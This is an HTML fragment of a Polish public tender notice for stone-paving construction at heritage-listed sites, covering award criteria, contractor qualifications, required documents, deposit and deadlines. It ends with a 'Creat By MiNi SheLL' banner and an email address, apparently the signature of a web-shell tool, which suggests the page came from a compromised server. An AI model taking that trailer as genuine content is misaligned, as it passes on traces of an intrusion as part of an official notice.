podkryteriów zostaną zsumowane.<br/>Ogólna ocena oferty suma punktów w kryteriach: „cena” i „gwarancja” :<br/>A+B = maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarnacja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Sytuacja ekonomiczna lub finansowa.<br/><br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a)	posiada zdolność kredytową lub środki finansowe w wysokości: 100 000,00 PLN<br/>b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną: minimum 250 000,00 PLN.<br/><br/>2. Zdolności techniczne lub zawodowe:<br/><br/>a)	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalny poziom zdolności w zakresie doświadczenia, a mianowicie: <br/>−	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie dwie roboty budowlane (realizowane na podstawie dwóch odrębnych umów) polegające na wykonaniu nawierzchni z kostki kamiennej o wartości minimum 100 000 złotych łącznie z podatkiem VAT za każdą z tych dwóch robót. <br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/><br/>b)	o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalny poziom zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>−	Kierownik budowy- minimalne wymagania: <br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń, określone przepisami ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) lub odpowiadające<br/>im uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz udział przez co najmniej 18 miesięcy w robotach<br/>budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru<br/>zabytków lub inwentarza muzeum będącego instytucją kultury.<br/><br/>−	Kierownik robót drogowych - minimalne wymagania: <br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz udział przez co najmniej 18 miesięcy w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury.<br/>przy czym Zamawiający dopuszcza możliwość pełnienia ww. funkcji kierownika budowy i kierownika robót drogowych przez jedną osobę, o ile osoba ta spełnia<br/>wszystkie wymagania opisane powyżej.<br/><br/>−	Kierownik robót elektrycznych - minimalne wymagania: <br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalność instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz udział przez co najmniej 18 miesięcy w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury . <br/><br/>Zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646) oraz ustawie z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2019 poz. 1117). <br/><br/>−	Archeolog – minimalne wymagania:<br/>spełnienie wymagań określonych w art. 37e ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2021 r. poz. 710),<br/><br/>Wszystkie wymagane osoby powinny posługiwać się językiem polskim. W przypadku, gdy osoby nie posiadają znajomości języka polskiego Wykonawca jest zobowiązany zapewnić tłumacza na język polski zapewniającego stałe, biegłe i fachowe tłumaczenie w kontaktach między Zamawiającym a Wykonawcą na okres realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów: <br/>1.	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej ;<br/>2.	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>3.	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/>4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów: <br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>5.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 p.z.p., należy zastąpić je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej lub finansowej zamawiający żąda od wykonawcy:<br/>1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiąc przed jej złożeniem; <br/>2)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. <br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału <br/>w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/><br/>W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej zamawiający żąda od wykonawcy: <br/>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone , przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienie wadium w kwocie 7 000,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1. w formularzu oferty należy wskazać nazwy firm wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>2. oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania: <br/>1) oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>2) sposób składania dokumentów w ofercie wspólnej:<br/>-dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu; <br/>- dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną; <br/>3. wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy; do oferty wspólnej wykonawcy dołączają pełnomocnictwo, pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp,<br/>4. dokumenty, o których mowa w rozdział XII pkt. 7 SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>5. wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy; <br/>6. wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7. zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna,<br/>8. przed podpisaniem umowy (w przypadku wygrania postępowania) wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum, zawierającą, co najmniej: <br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>2)	określenie zakresu działania poszczególnych stron umowy, <br/>3)	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewiduje się zmiany umowy polegające na: <br/>1)	uzasadnionym przedłużeniu terminu realizacji umowy w razie wystąpienia: <br/>a)	warunków atmosferycznych uniemożliwiających kontynuowanie wykonywania robót budowlanych, jednak nie dłużej niż o czas trwania tych warunków; fakt ten musi zostać potwierdzony przez Inspektorów Nadzoru Inwestorskiego i zgłoszony niezwłocznie Zamawiającemu, <br/>b)	sytuacji, o których mowa w pkt 2, a mających wpływ na czas trwania realizacji prac, <br/>c)	działania siły wyższej, np. klęski żywiołowe, strajki generalne lub lokalne, mające bezpośredni wpływ na terminowość wykonania prac, <br/>2)	zmianie będącej wynikiem zmian powszechnie obowiązujących przepisów prawa, których uchwalenie lub zmiana nastąpiły po dniu zawarcia niniejszej umowy, a z których treści wynika konieczność lub zasadność wprowadzenia zmian, mających wpływ na realizację umowy, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem miniPortalu dostępnego pod adresem internetowym: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com